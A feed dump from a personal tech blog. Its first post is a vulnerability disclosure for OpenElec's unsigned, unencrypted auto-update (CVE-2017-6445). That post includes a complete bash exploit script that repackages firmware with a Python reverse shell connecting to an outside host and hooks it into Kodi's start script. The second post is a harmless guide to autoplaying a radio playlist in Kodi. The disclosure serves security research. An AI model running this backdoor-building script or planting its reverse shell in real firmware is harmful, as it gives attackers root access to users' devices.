OpenElec https://tech.feedyourhead.at/tags/openelec en OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle(CVE-2017-6445) https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle <span class="field field--name-title field--type-string field--label-hidden">OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle(CVE-2017-6445) </span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>During my research about update mechanisms of open-source software I discovered vulnerabilities in OpenElec.</p> <h3>Overview</h3> <ul><li>System affected: OpenElec</li> <li>CVE: CVE-2017-6445</li> <li>Vulnerable component: auto-update feature</li> <li>Software-Version: 6.0.3, 7.0.1</li> <li>User-Interaction: Reboot required</li> <li>Impact: Remote Code Execution with root permission</li> </ul><h3>Product Description</h3> <p>According to its <a href="http://openelec.tv/">website</a> "<strong>Open Embedded Linux Entertainment Center (OpenELEC)</strong> is a small Linux based <a href="http://en.wikipedia.org/wiki/Just_enough_operating_system" target="_blank">Just Enough Operating System (JeOS)</a> built from scratch as a platform to turn your computer into a <a href="http://kodi.tv">Kodi</a> media center."</p> <h3>Vulnerability</h3> <p>Automatic updates are disabled by default. After enabling it, OpenElec connects to http://update.openelec.tv/updates.php to find out if there is an update for a newer version. If there is a newer version, openelec will download it from http://releases.openelec.tv/&lt;version&gt;.tar(or any other url returned by update.openelec.tv).</p> <p><img alt="openelec-update-schema" data-entity-type="file" data-entity-uuid="15f13d18-13cc-4322-928a-47b63d91e0f6" src="/sites/default/files/inline-images/OpenElec-Update-Schema.png" /></p> <p>The auto-update feature of OpenElec does neither use encrypted connections nor does it use signed updates. A Man-In-The-Middle could manipulate the update-packages to gain root-access remotely.</p> <p><img alt="openelec-attac" data-entity-type="file" data-entity-uuid="d6818f0c-10bc-400b-b904-46233d12df90" src="/sites/default/files/inline-images/OpenElec-Angriff-Schema_0.png" /></p> <p>In order to run the downloaded firmware, the OpenElec-system has to be rebooted. So at this point user-interaction is required.</p> <h3>Exploit</h3> <p>The following code downloads an openelec-firmware, extracts it, places a reverse-shell into the kodi-startscript and finally generates a backdoored firmware:</p> <p></p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#!/bin/bash</span>   <span style="color: #007800;">OPENELEC</span>=<span style="color: #ff0000;">"OpenELEC-RPi2.arm-7.0.1"</span> <span style="color: #007800;">DOWNLOADURL</span>=<span style="color: #ff0000;">"http://releases.openelec.tv/"</span>   <span style="color: #007800;">TMP</span>=<span style="color: #ff0000;">"/tmp"</span>   <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span> <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-e</span> <span style="color: #800000;">${OPENELEC}</span>.tar <span style="color: #000000; font-weight: bold;">||</span> <span style="color: #c20cb9; font-weight: bold;">wget</span> <span style="color: #007800;">$DOWNLOADURL</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #800000;">${OPENELEC}</span>.tar <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$OPENELEC</span> <span style="color: #000000; font-weight: bold;">||</span> <span style="color: #c20cb9; font-weight: bold;">tar</span> xvf <span style="color: #800000;">${OPENELEC}</span>.tar   <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #000000; font-weight: bold;">||</span> <span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root <span style="color: #000000; font-weight: bold;">||</span> unsquashfs <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$OPENELEC</span><span style="color: #000000; font-weight: bold;">/</span>target<span style="color: #000000; font-weight: bold;">/</span>SYSTEM   <span style="color: #c20cb9; font-weight: bold;">cat</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span>revshell.sh <span style="color: #cc0000; font-style: italic;">&lt;&lt; EOF #!/bin/bash   while true do python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.12.32.15",5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &gt; /dev/null 2&gt;&amp;1 done EOF</span>   <span style="color: #c20cb9; font-weight: bold;">chmod</span> <span style="color: #000000;">777</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>bin<span style="color: #000000; font-weight: bold;">/</span>revshell.sh   <span style="color: #c20cb9; font-weight: bold;">awk</span> <span style="color: #ff0000;">'/trap cleanup TERM/ { print; print "/usr/bin/revshell.sh &amp;"; next }1'</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodi.sh <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodievil.sh <span style="color: #c20cb9; font-weight: bold;">mv</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodievil.sh <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodi.sh <span style="color: #c20cb9; font-weight: bold;">chmod</span> <span style="color: #000000;">777</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked<span style="color: #000000; font-weight: bold;">/</span>squashfs-root<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>kodi<span style="color: #000000; font-weight: bold;">/</span>kodi.sh   mksquashfs squashfs-root<span style="color: #000000; font-weight: bold;">/</span> SYS <span style="color: #660033;">-noappend</span> <span style="color: #660033;">-comp</span> <span style="color: #c20cb9; font-weight: bold;">gzip</span>   <span style="color: #c20cb9; font-weight: bold;">mv</span> SYS <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$OPENELEC</span><span style="color: #000000; font-weight: bold;">/</span>target<span style="color: #000000; font-weight: bold;">/</span>SYSTEM <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$OPENELEC</span> md5sum target<span style="color: #000000; font-weight: bold;">/</span>SYSTEM <span style="color: #000000; font-weight: bold;">&gt;</span> target<span style="color: #000000; font-weight: bold;">/</span>SYSTEM.md5 <span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #007800;">$TMP</span> <span style="color: #c20cb9; font-weight: bold;">tar</span> cvf <span style="color: #007800;">$OPENELEC</span>.evil.tar <span style="color: #007800;">$OPENELEC</span>     <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">rm</span> <span style="color: #660033;">-fr</span> <span style="color: #007800;">$TMP</span><span style="color: #000000; font-weight: bold;">/</span>unpacked <span style="color: #7a0874; font-weight: bold;">test</span> <span style="color: #660033;">-d</span> <span style="color: #007800;">$OPENELEC</span> <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">rm</span> <span style="color: #660033;">-rf</span> <span style="color: #007800;">$OPENELEC</span></pre></div> <h3>Mitigation</h3> <p>Ensure that auto-update is disabled.</p> <h3>Timeline</h3> <ul><li>This bug was reported on December 03 2016.</li> <li>Published as Zero-Day after no reply from OpenElec on March 04 2017</li> </ul><h3>Credits</h3> <p>CVE-2017-6445 was discovered by Wolfgang Hotwagner (<a href="https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle">https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle)</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Mar 03 2017</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/openelec" hreflang="en">OpenElec</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=231&amp;2=comment&amp;3=comment" token="ElyHFr1PfrXWDF1Kma0FRnCJYIiGEcsnbiSxleu3sHc"></drupal-render-placeholder> </section> Fri, 03 Mar 2017 21:17:42 +0000 Hoti 231 at https://tech.feedyourhead.at Kodi: Autoplay on start-up.. https://tech.feedyourhead.at/content/kodi-autoplay-start <span class="field field--name-title field--type-string field--label-hidden">Kodi: Autoplay on start-up..</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><img alt="" src="http://tech.feedyourhead.at/sites/tech.feedyourhead.at/files/pictures/kodi.png" /></p> <p>When I get up in the morning I start my Raspberry Pi(OpenElec installed) and listen to the local radio stations. It would be awesome if my pi automatically plays my favourite station after booting. That's why I played a bit with the MediaCenter Kodi.</p> <p>First of all I enabled SSH (OpenElec Settings) and connected via ssh. Then I created a m3u-Playlist under "/storage/.kodi/userdata/playlists/music/superfly.m3u"</p> <p>superfly.m3u:</p> <pre> <code> http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live http://stream01.superfly.fm:8080/live </code></pre> <p>I am using the same stream-entry multiple times. If network is not up'n'running at boottime, kodi would just try another entry(and another and another...).</p> <p>Now I just have to make sure that kodi plays this playlist after booting:</p> <p>Under Settings-&gt;Appearance-&gt;Skin-&gt;Settings is a Option for "Enable playlist at startup". As soon as you enable the radio-button "Enable playlist at startup", you'll be able to choose a path for the playlist.</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Aug 23 2015</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/kodi" hreflang="en">Kodi</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/media" hreflang="en">Media</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/music" hreflang="en">Music</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/openelec" hreflang="en">OpenElec</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=99&amp;2=comment&amp;3=comment" token="ckwpeAMdlIinC--7gtztwJF3HltnZiNYcGwYBYkfOVc"></drupal-render-placeholder> </section> Sun, 23 Aug 2015 16:48:19 +0000 Hoti 99 at https://tech.feedyourhead.at